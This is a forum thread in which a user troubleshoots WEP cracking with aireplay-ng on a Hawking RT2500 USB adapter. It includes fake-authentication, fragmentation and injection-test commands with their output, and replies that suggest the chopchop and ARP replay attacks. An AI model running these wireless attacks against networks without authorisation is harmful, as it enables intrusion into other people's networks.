Hawking Wireless G and Aireplay
Ok, so i'm new to the remote exploit forums so be gentle (i know the awe inspiring power of a moderator scorned).
Basically, I hopped on the usb wifi card bandwagon (i'm a recovering pcmcia junkie). So i'm running through some issues i'm encountering with the new card. First the obligatory particulars:
Its a Hawking wireless G usb wireless adapter.
Its an RT2500 chipset adapter.
I'm running BT3BETA (the current latest, i think released in Dec).
So, WPA/WPA2 Cracking is going ok (well, its pretty much just a grab and bag anyway) but wep cracking is spotty. And here's why i say that.
First, as usual i place the card in monitor mode (its rausb0).
Then i perform the association and authentication step (aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI rausb0). Both successful.
The problem starts when i go to perform the fragmentation attack. So, i run aireplay-ng -5 -b $AP -h $WIFI rausb0 and this is what i get after i select the packet to use:
09:19:51 Data packet found!
09:19:51 Sending fragmented packet
09:19:53 No answer, repeating...
<repeats a bit>
09:20:39 Still nothing, trying another packet...
This goes on for a bit. but never grabs the fragment xor file.
Sometimes when i mess with antenna positioning i get:
09:24:10 Data packet found!
09:24:10 Sending fragmented packet
09:24:12 No answer, repeating...
09:24:12 Trying a LLC NULL packet
09:24:12 Sending fragmented packet
09:24:12 Got RELAYED packet!!
09:24:12 Trying to get 384 bytes of a keystream
09:24:14 No answer, repeating...
(the GOT RELAYED packet!! and keystream line are different than before)
sometimes i get a third variation with a lie saying not enough acks.
The problem is i've seen on the same card for the fragment file to be created in like the first run through of a packet grabbed. Another time the second. I'm trying to get a better understanding of if its something i'm doing wrong or just signal, as i've had mixed results being able to crack an AP right next to me or one next door (dont worry my girlfriends sister lives next door to her and I got her permission, so dont hop on me Trolls!)
I got so curious i ran the inject test built into aircrack with the following syntax:
aireplay-ng -9 -e $SSID -a $AP -i ath0 rausb0
09:30:33 Waiting for beacon frame (BSSID: 00:19:E4:73:53:B9) on channel 11
09:30:33 Trying broadcast probe requests...
09:30:33 Injection is working!
09:30:35 Found 1 AP
09:30:35 Trying directed probe requests...
09:30:35 00:19:E4:73:53:B9 - channel: 11 - '2WIRE744'
09:30:37 Ping (min/avg/max): 0.695ms/58.322ms/68.006ms Power: 24.20
09:30:37 30/30: 100%
09:30:37 Trying card-to-card injection...
09:30:37 Attack -0: OK
09:30:37 Attack -1 (open): OK
09:30:38 Attack -1 (psk): OK
09:30:39 Attack -2/-3/-4: OK
09:30:43 Attack -5: Failed
ath0 is an internal wifi in my laptop.
Guess i wrote a book there but any help is appreciated in advance.
Have you tried the -4 attack or the -3 attack. Please let us know how you get on with those.
-4 worked with the card. any idea why -5 isn't? Mac filtering you think?
Sometimes both attacks don't work. I imagine thats why there are two different ones.
Well hey, thanks for the help. Wep down, dictionary brute force of wpa/wpa2 down, airpwn (just fun) and now...time for learning about airolib and the aircrack-ng server pieces.